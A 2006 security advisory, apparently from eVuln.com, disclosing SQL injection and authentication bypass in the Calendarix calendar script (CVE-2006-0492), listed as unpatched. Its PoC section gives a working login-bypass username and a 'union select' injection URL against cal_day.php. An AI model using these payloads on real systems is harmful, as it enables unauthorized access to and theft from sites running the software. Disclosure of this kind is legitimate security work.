SQL Injection and Authentication Bypass in Calendarix
Summary
- Vulnerability
- SQL Injection and Authentication Bypass in Calendarix
- Discovered
- 2006.01.26
- Last Update
- 0 n/a
- ID
- EV0052
- CVE
- CVE-2006-0492
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched
- Vendor
- n/a
- Vulnerable Software
- Calendarix (http://www.calendarix.com/)
- Version
- 0.6.20050830
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in Calendarix (http://www.calendarix.com/) script.
Vulnerable scripts: cal_functions.inc.php admin/cal_login.php
Variables $catview(cal_functions.inc.php) $login(admin/cal_login.php) are not properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Authentication bypass is possible.
Condition for Authentication bypass: magic_quotes_gpc - off
PoC/Exploit
1. Authentication Bypass
Link: http://host/calendarix/admin/cal_login.php
username: ' or 1/*
password: any
2. SQL-Injection Example
http://host/calendarix/cal_day.php?op=day&date=2006-01-10&catview=99%20union%20select%2012345
Solution.
Solution for "SQL Injection and Authentication Bypass in Calendarix" is not available. Check vendor's website for updates.